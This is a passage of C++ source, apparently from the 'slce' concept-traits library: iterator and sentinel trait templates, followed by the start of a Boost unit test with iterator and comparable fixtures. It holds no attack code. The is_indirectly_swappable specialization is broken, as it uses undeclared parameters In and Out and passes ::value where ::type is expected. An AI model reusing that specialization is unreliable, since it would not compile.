template< typename T, typename Enable = void >
struct is_iterator : public std::false_type {};
template< typename T >
struct is_iterator< T, typename std::enable_if<
detail::can_reference< decltype( *std::declval< T >() ) >::value &&
is_weakly_incrementable< T >::value
>::type > : public std::true_type {};
SLCE_HELPER( Iterator, is_iterator )
template< typename S, typename I, typename Enable = void >
struct is_sentinel : public std::false_type {};
template< typename S, typename I >
struct is_sentinel< S, I, typename std::enable_if<
is_semiregular< S >::value &&
is_iterator< I >::value &&
detail::is_weakly_equality_comparable_with< S, I >::value
>::type > : public std::true_type {};
SLCE_HELPER( Sentinel, is_sentinel )
namespace range {
#if defined(__cpp_lib_ranges) && defined(__cpp_variable_templates)
template< typename S, typename I >
struct disable_sized_sentinel : public std::integral_constant< bool, std::disable_sized_sentinel< S, I > > {};
#else
template< typename S, typename I >
struct disable_sized_sentinel : public std::false_type {};
#endif
}
template< typename S, typename I, typename Enable = void >
struct is_sized_sentinel : public std::false_type {};
template< typename S, typename I >
struct is_sized_sentinel< S, I, typename std::enable_if<
is_sentinel< S, I >::value &&
!range::disable_sized_sentinel< typename std::remove_cv< S >::type, typename std::remove_cv< I >::type >::value &&
is_same< decltype( std::declval< const S& >() - std::declval< const I& >() ), iter_difference_t< I > >::value //&&
//is_same< decltype( std::declval< const I& >() - std::declval< const S& >() ), iter_difference_t< I > >::value
>::type > : public std::true_type {};
SLCE_HELPER( SizedSentinel, is_sized_sentinel )
namespace detail {
template< typename T, typename Enable = void >
struct has_iterator_concept : public std::false_type {};
template< typename T >
struct has_iterator_concept< T, typename voider< typename T::iterator_concept >::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct has_iterator_category : public std::false_type {};
template< typename T >
struct has_iterator_category< T, typename voider< typename T::iterator_category >::type > : public std::true_type {};
// Note: this trait does not work like ITER_CONCEPT(I) described in n4810 section 22.3.4.1-1.
// Since there are no way to detect primary template unintrusively, slce iter_concept just try to find iterator concept regardless of the iterator_traits is primary template or not.
template< typename T, typename Enable = void >
struct iter_concept {};
template< typename T >
struct iter_concept< T, typename std::enable_if<
has_iterator_concept< std::iterator_traits< T > >::value
>::type > {
using type = typename std::iterator_traits< T >::iterator_concept;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
has_iterator_concept< T >::value
>::type > {
using type = typename T::iterator_concept;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
!has_iterator_concept< T >::value &&
has_iterator_category< std::iterator_traits< T > >::value
>::type > {
using type = typename std::iterator_traits< T >::iterator_category;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
!has_iterator_concept< T >::value &&
!has_iterator_category< std::iterator_traits< T > >::value &&
has_iterator_category< T >::value
>::type > {
using type = typename T::iterator_category;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
!has_iterator_concept< T >::value &&
!has_iterator_category< std::iterator_traits< T > >::value &&
!has_iterator_category< T >::value &&
is_iterator< T >::value
>::type > {
using type = std::random_access_iterator_tag;
};
}
template< typename T, typename Enable = void >
struct is_input_iterator : public std::false_type {};
template< typename T >
struct is_input_iterator< T, typename std::enable_if<
is_iterator< T >::value &&
is_readable< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::input_iterator_tag >::value
>::type > : public std::true_type {};
SLCE_HELPER( InputIterator, is_input_iterator )
template< typename I, typename T, typename Enable = void >
struct is_output_iterator : public std::false_type {};
template< typename I, typename T >
struct is_output_iterator< I, T, typename detail::voider<
typename std::enable_if<
is_iterator< I >::value &&
is_writable< I, T >::value
>::type,
decltype( *std::declval< I& >()++ = std::forward< T >( std::declval< T&& >() ) )
>::type > : public std::true_type {};
SLCE_HELPER( OutputIterator, is_output_iterator )
template< typename T, typename Enable = void >
struct is_forward_iterator : public std::false_type {};
template< typename T >
struct is_forward_iterator< T, typename std::enable_if<
is_input_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::forward_iterator_tag >::value &&
is_incrementable< T >::value &&
is_sentinel< T, T >::value
>::type > : public std::true_type {};
SLCE_HELPER( ForwardIterator, is_forward_iterator )
template< typename T, typename Enable = void >
struct is_bidirectional_iterator : public std::false_type {};
template< typename T >
struct is_bidirectional_iterator< T, typename std::enable_if<
is_forward_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::bidirectional_iterator_tag >::value &&
is_same< decltype( --std::declval< T& >() ), T& >::value &&
is_same< decltype( std::declval< T& >()-- ), T >::value
>::type > : public std::true_type {};
SLCE_HELPER( BidirectionalIterator, is_bidirectional_iterator )
template< typename T, typename Enable = void >
struct is_random_access_iterator : public std::false_type {};
template< typename T >
struct is_random_access_iterator< T, typename std::enable_if<
is_bidirectional_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::random_access_iterator_tag >::value &&
is_strict_totally_ordered< T >::value &&
is_sized_sentinel< T, T >::value &&
is_same< decltype( std::declval< T& >() += std::declval< iter_difference_t< T > >() ), T& >::value &&
is_same< decltype( std::declval< const T& >() + std::declval< iter_difference_t< T > >() ), T >::value &&
is_same< decltype( std::declval< iter_difference_t< T > >() + std::declval< const T& >() ), T >::value &&
is_same< decltype( std::declval< T& >() -= std::declval< iter_difference_t< T > >() ), T& >::value &&
is_same< decltype( std::declval< const T& >() - std::declval< iter_difference_t< T > >() ), T >::value &&
is_same< decltype( std::declval< const T& >()[ std::declval< iter_difference_t< T > >() ] ), iter_reference_t< T > >::value
>::type > : public std::true_type {};
SLCE_HELPER( RandomAccessIterator, is_random_access_iterator )
#ifdef __cpp_lib_ranges
using contiguous_iterator_tag = std::contiguous_iterator_tag;
#else
struct contiguous_iterator_tag : public std::random_access_iterator_tag {};
#endif
template< typename T, typename Enable = void >
struct is_contiguous_iterator : public std::false_type {};
template< typename T >
struct is_contiguous_iterator< T, typename std::enable_if<
is_random_access_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, contiguous_iterator_tag >::value &&
std::is_lvalue_reference< iter_reference_t< T > >::value &&
is_same< iter_value_t< T >, typename detail::remove_cvref< iter_reference_t< T > >::type >::value
>::type > : public std::true_type {};
SLCE_HELPER( ContiguousIterator, is_contiguous_iterator )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_movable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_movable< In, Out, typename std::enable_if<
is_readable< In >::value &&
is_writable< Out, iter_rvalue_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyMovable, is_indirectly_movable )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_movable_storable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_movable_storable< In, Out, typename std::enable_if<
is_indirectly_movable< In, Out >::value &&
is_writable< Out, iter_value_t< In > >::value &&
is_constructible< iter_value_t< In >, iter_rvalue_reference_t< In > >::value &&
is_assignable< iter_value_t< In >&, iter_rvalue_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyMovableStorable, is_indirectly_movable_storable )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_copyable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_copyable< In, Out, typename std::enable_if<
is_readable< In >::value &&
is_writable< Out, iter_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyCopyable, is_indirectly_copyable )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_copyable_storable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_copyable_storable< In, Out, typename std::enable_if<
is_indirectly_copyable< In, Out >::value &&
is_writable< Out, iter_value_t< In > >::value &&
is_copyable< iter_value_t< In > >::value &&
is_constructible< iter_value_t< In >, iter_reference_t< In > >::value &&
is_assignable< iter_value_t< In >&, iter_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyCopyableStorable, is_indirectly_copyable_storable )
template< typename I1, typename I2, typename Enable = void >
struct is_indirectly_swappable : public std::false_type {};
#ifdef __cpp_lib_ranges
template< typename I1, typename I2 >
struct is_indirectly_swappable< In, Out, typename detail::voider<
typename std::enable_if<
is_readable< I1 >::value &&
is_readable< I2 >::value
>::value,
decltype( std::ranges::iter_swap( std::declval< I1 >(), std::declval< I1 >() ) ),
decltype( std::ranges::iter_swap( std::declval< I2 >(), std::declval< I2 >() ) ),
decltype( std::ranges::iter_swap( std::declval< I1 >(), std::declval< I2 >() ) ),
decltype( std::ranges::iter_swap( std::declval< I2 >(), std::declval< I1 >() ) )
>::type > : public std::true_type {};
#endif
SLCE_HELPER( IndirectlySwappable, is_indirectly_swappable )
/*
namespace detail {
template< typename T >
struct identity {
template< typename T >
constexpr T&& operator()( T &&t ) const noexcept {
return std::forward< T >( t );
}
};
}
template< typename I1, typename I2, typename R, typename P1 = detail::identity, typename P2 = detail::identity, typename Enable = void >
struct is_indirectly_comparable : public std::false_type {};
template< typename I1, typename I2, typename R, typename P1, typename P2 >
struct is_indirectly_comparable< I1, I2, R, P1, P2, typename std::enable_if<
///
>::type > : public std::false_type {};
*/
}
#endif
<|start_filename|>test/slce.cpp<|end_filename|>
/*
* Copyright (c) 2019 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#define BOOST_TEST_MAIN
#include <vector>
#include <boost/test/included/unit_test.hpp>
#include <slce/slce.hpp>
struct base {};
struct inherited : public base {};
struct other {};
struct non_copyable {
non_copyable( const non_copyable& ) = delete;
non_copyable &operator=( const non_copyable& ) = delete;
};
struct copyable {
copyable( const copyable& ) = default;
copyable &operator=( const copyable& ) = default;
};
struct movable {
movable( const movable& ) = delete;
movable( movable&& ) = default;
movable &operator=( const movable& ) = delete;
movable &operator=( movable&& ) = default;
};
struct partially_castable_t1 {};
struct partially_castable_t2 {
partially_castable_t2( const partially_castable_t1& ) {}
partially_castable_t2( partially_castable_t1&& ) {}
partially_castable_t2 &operator=( const partially_castable_t1& ) { return *this; };
partially_castable_t2 &operator=( partially_castable_t1&& ) { return *this; };
operator partially_castable_t1() const { return partially_castable_t1(); }
};
using fully_castable_t1 = inherited;
using fully_castable_t2 = base;
using default_constructible = base;
struct constructible_with_int {
constructible_with_int( int ) {}
};
using destructible = base;
class non_destructible {
~non_destructible() {}
};
struct bool_like {
bool_like( bool ) {}
bool_like( bool_like&& ) {}
bool_like &operator=( bool_like&& ) { return *this; }
bool operator!() const {
return false;
}
operator bool() const {
return true;
}
};
bool operator&&( const bool_like&, bool ) { return true; }
bool operator||( const bool_like&, bool ) { return true; }
bool operator&&( bool, const bool_like& ) { return true; }
bool operator||( bool, const bool_like& ) { return true; }
bool operator&&( const bool_like&, const bool_like& ) { return true; }
bool operator||( const bool_like&, const bool_like& ) { return true; }
bool operator==( const bool_like&, bool ) { return true; }
bool operator!=( const bool_like&, bool ) { return true; }
bool operator==( bool, const bool_like& ) { return true; }
bool operator!=( bool, const bool_like& ) { return true; }
bool operator==( const bool_like&, const bool_like& ) { return true; }
bool operator!=( const bool_like&, const bool_like& ) { return true; }
bool operator&&( const volatile bool_like&, bool ) { return true; }
bool operator||( const volatile bool_like&, bool ) { return true; }
bool operator&&( bool, const volatile bool_like& ) { return true; }
bool operator||( bool, const volatile bool_like& ) { return true; }
bool operator&&( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator||( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator&&( const bool_like&, const volatile bool_like& ) { return true; }
bool operator||( const bool_like&, const volatile bool_like& ) { return true; }
bool operator&&( const volatile bool_like&, const bool_like& ) { return true; }
bool operator||( const volatile bool_like&, const bool_like& ) { return true; }
bool operator==( const volatile bool_like&, bool ) { return true; }
bool operator!=( const volatile bool_like&, bool ) { return true; }
bool operator==( bool, const volatile bool_like& ) { return true; }
bool operator!=( bool, const volatile bool_like& ) { return true; }
bool operator==( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator!=( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator==( const bool_like&, const volatile bool_like& ) { return true; }
bool operator!=( const bool_like&, const volatile bool_like& ) { return true; }
bool operator==( const volatile bool_like&, const bool_like& ) { return true; }
bool operator!=( const volatile bool_like&, const bool_like& ) { return true; }
using incomparable = base;
struct comparable {};
struct comparable_inconvertible {};
struct comparable_convertible : public comparable {};
struct partially_comparable {};
bool operator&&( const comparable&, const comparable& ) { return true; }
bool operator&&( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator&&( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator&&( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator&&( const comparable&, const partially_comparable& ) { return true; }
bool operator&&( const partially_comparable&, const comparable& ) { return true; }
bool operator||( const comparable&, const comparable& ) { return true; }
bool operator||( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator||( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator||( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator||( const comparable&, const partially_comparable& ) { return true; }
bool operator||( const partially_comparable&, const comparable& ) { return true; }
bool operator==( const comparable&, const comparable& ) { return true; }
bool operator==( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator==( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator==( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator==( const comparable&, const partially_comparable& ) { return true; }
bool operator==( const partially_comparable&, const comparable& ) { return true; }
bool operator!=( const comparable&, const comparable& ) { return true; }
bool operator!=( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator!=( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator!=( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator!=( const comparable&, const partially_comparable& ) { return true; }
bool operator!=( const partially_comparable&, const comparable& ) { return true; }
bool operator<( const comparable&, const comparable& ) { return true; }
bool operator<( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator<( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator<( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator<( const comparable&, const partially_comparable& ) { return true; }
bool operator<( const partially_comparable&, const comparable& ) { return true; }
bool operator>( const comparable&, const comparable& ) { return true; }
bool operator>( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator>( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator>( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator>( const comparable&, const partially_comparable& ) { return true; }
bool operator>( const partially_comparable&, const comparable& ) { return true; }
bool operator<=( const comparable&, const comparable& ) { return true; }
bool operator<=( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator<=( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator<=( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator<=( const comparable&, const partially_comparable& ) { return true; }
bool operator<=( const partially_comparable&, const comparable& ) { return true; }
bool operator>=( const comparable&, const comparable& ) { return true; }
bool operator>=( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator>=( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator>=( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator>=( const comparable&, const partially_comparable& ) { return true; }
bool operator>=( const partially_comparable&, const comparable& ) { return true; }
bool operator&&( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator&&( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator&&( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator&&( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator&&( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator&&( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator||( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator||( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator||( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator||( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator||( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator||( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator==( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator==( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator==( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator==( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator==( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator==( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator!=( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator!=( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator!=( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator!=( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator!=( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator!=( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator<( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator<( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator<( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator<( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator<( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator<( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator>( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator>( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator>( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator>( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator>( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator>( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator<=( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator<=( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator<=( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator<=( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator<=( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator<=( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator>=( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator>=( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator>=( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator>=( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator>=( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator>=( const volatile partially_comparable&, const volatile comparable& ) { return true; }
struct callable {
int operator()( int a, int b ) { return a + b; };
};
struct predicate {
bool operator()( const base&, const other& ) { return true; };
};
struct relation {
bool operator()( const base&, const base& ) { return true; };
bool operator()( const other&, const other& ) { return true; };
bool operator()( const base&, const other& ) { return true; };
bool operator()( const other&, const base& ) { return true; };
};
struct implicit_input_iterator {
using value_type = int;
int operator*() const {
return 0;
}
implicit_input_iterator &operator++() {
return *this;
}
void operator++(int) {}
};
bool operator==( const implicit_input_iterator&, const implicit_input_iterator& ) { return true; }
bool operator!=( const implicit_input_iterator&, const implicit_input_iterator& ) { return false; }
int operator-( const implicit_input_iterator&, const implicit_input_iterator& ) { return 0; }
struct explicit_input_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int;
int operator*() const {
return 0;
}
explicit_input_iterator &operator++() {
return *this;
}
void operator++(int) {}
};
bool operator==( const explicit_input_iterator&, const explicit_input_iterator& ) { return true; }
bool operator!=( const explicit_input_iterator&, const explicit_input_iterator& ) { return false; }
int operator-( const explicit_input_iterator&, const explicit_input_iterator& ) { return 0; }
using implicit_non_output_iterator = implicit_input_iterator;
using explicit_non_output_iterator = explicit_input_iterator;
struct implicit_forward_iterator {
using value_type = int;
int &operator*() const {
static int value = 0;
return value;
}
implicit_forward_iterator &operator++() {
return *this;
}
implicit_forward_iterator operator++(int) {
return *this;
}
};
bool operator==( const implicit_forward_iterator&, const implicit_forward_iterator& ) { return true; }
bool operator!=( const implicit_forward_iterator&, const implicit_forward_iterator& ) { return false; }
int operator-( const implicit_forward_iterator&, const implicit_forward_iterator& ) { return 0; }
struct explicit_forward_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int&;
int &operator*() const {
static int value = 0;
return value;
}
explicit_forward_iterator &operator++() {
return *this;
}
explicit_forward_iterator operator++(int) {
return *this;
}
};
using implicit_output_iterator = implicit_forward_iterator;
using explicit_output_iterator = explicit_forward_iterator;
bool operator==( const explicit_forward_iterator&, const explicit_forward_iterator& ) { return true; }
bool operator!=( const explicit_forward_iterator&, const explicit_forward_iterator& ) { return false; }
int operator-( const explicit_forward_iterator&, const explicit_forward_iterator& ) { return 0; }
struct implicit_bidirectional_iterator {
using value_type = int;
int &operator*() const {
static int value = 0;
return value;
}
implicit_bidirectional_iterator &operator++() {
return *this;
}
implicit_bidirectional_iterator operator++(int) {
return *this;
}
implicit_bidirectional_iterator &operator--() {
return *this;
}
implicit_bidirectional_iterator operator--(int) {
return *this;
}
};
bool operator==( const implicit_bidirectional_iterator&, const implicit_bidirectional_iterator& ) { return true; }
bool operator!=( const implicit_bidirectional_iterator&, const implicit_bidirectional_iterator& ) { return false; }
int operator-( const implicit_bidirectional_iterator&, const implicit_bidirectional_iterator& ) { return 0; }
struct explicit_bidirectional_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int&;
int &operator*() const {
static int value = 0;
return value;
}
explicit_bidirectional_iterator &operator++() {
return *this;
}
explicit_bidirectional_iterator operator++(int) {
return *this;
}
explicit_bidirectional_iterator &operator--() {
return *this;
}
explicit_bidirectional_iterator operator--(int) {
return *this;
}
};
bool operator==( const explicit_bidirectional_iterator&, const explicit_bidirectional_iterator& ) { return true; }
bool operator!=( const explicit_bidirectional_iterator&, const explicit_bidirectional_iterator& ) { return false; }
int operator-( const explicit_bidirectional_iterator&, const explicit_bidirectional_iterator& ) { return 0; }
struct implicit_random_access_iterator {
using value_type = int;
int &operator*() const {
static int value = 0;
return value;
}
int &operator[](int) const {
static int value = 0;
return value;
}
implicit_random_access_iterator &operator++() {
return *this;
}
implicit_random_access_iterator operator++(int) {
return *this;
}
implicit_random_access_iterator &operator+=(int) {
return *this;
}
implicit_random_access_iterator &operator--() {
return *this;
}
implicit_random_access_iterator operator--(int) {
return *this;
}
implicit_random_access_iterator &operator-=(int) {
return *this;
}
};
bool operator==( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return true; }
bool operator!=( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return false; }
bool operator<( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return false; }
bool operator>( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return false; }
bool operator<=( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return true; }
bool operator>=( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return true; }
int operator-( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return 0; }
implicit_random_access_iterator operator+( int, const implicit_random_access_iterator &a ) { return a; }
implicit_random_access_iterator operator+( const implicit_random_access_iterator &a, int ) { return a; }
implicit_random_access_iterator operator-( const implicit_random_access_iterator &a, int ) { return a; }
struct explicit_random_access_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int&;
int &operator*() const {
static int value = 0;
return value;
}
int &operator[](int) const {
static int value = 0;
return value;
}
explicit_random_access_iterator &operator++() {
return *this;
}
explicit_random_access_iterator operator++(int) {
return *this;
}
explicit_random_access_iterator &operator+=(int) {
return *this;
}
explicit_random_access_iterator &operator--() {
return *this;
}
explicit_random_access_iterator operator--(int) {
return *this;
}
explicit_random_access_iterator &operator-=(int) {
return *this;
}
};
bool operator==( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return true; }
bool operator!=( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return false; }
bool operator<( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return false; }
bool operator>( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return false; }
bool operator<=( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return true; }
bool operator>=( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return true; }
int operator-( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return 0; }
explicit_random_access_iterator operator+( int, const explicit_random_access_iterator &a ) { return a; }
explicit_random_access_iterator operator+( const explicit_random_access_iterator &a, int ) { return a; }
explicit_random_access_iterator operator-( const explicit_random_access_iterator &a, int ) { return a; }
template< typename T >
struct sentinel {};
template< typename T >
bool operator==( const sentinel< T >&, const sentinel< T >& ) { return true; }
template< typename T >
bool operator==( const sentinel< T >&, const T& ) { return true; }
template< typename T >
bool operator==( const T&, const sentinel< T >& ) { return true; }
template< typename T >
bool operator!=( const sentinel< T >&, const sentinel< T >& ) { return false; }
template< typename T >
bool operator!=( const sentinel< T >&, const T& ) { return false; }
template< typename T >
bool operator!=( const T&, const sentinel< T >& ) { return false; }
template< typename T >
struct sized_sentinel {};
template< typename T >
bool operator==( const sized_sentinel< T >&, const sized_sentinel< T >& ) { return true; }
template< typename T >
bool operator==( const sized_sentinel< T >&, const T& ) { return true; }
template< typename T >
bool operator==( const T&, const sized_sentinel< T >& ) { return true; }
template< typename T >
bool operator!=( const sized_sentinel< T >&, const sized_sentinel< T >& ) { return false; }
template< typename T >
bool operator!=( const sized_sentinel< T >&, const T& ) { return false; }
template< typename T >
bool operator!=( const T&, const sized_sentinel< T >& ) { return false; }
template< typename T >
auto operator-( const T &i, const sized_sentinel< T >& ) { return i - i; }
template< typename T >
auto operator-( const sized_sentinel< T >&, const T &i ) { return i - i; }
BOOST_AUTO_TEST_CASE(Same) {
BOOST_CHECK_EQUAL( ( slce::is_same< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_same< base, inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< inherited, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< const base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(DerivedFrom) {
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, volatile base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< inherited, base >::value ), true );
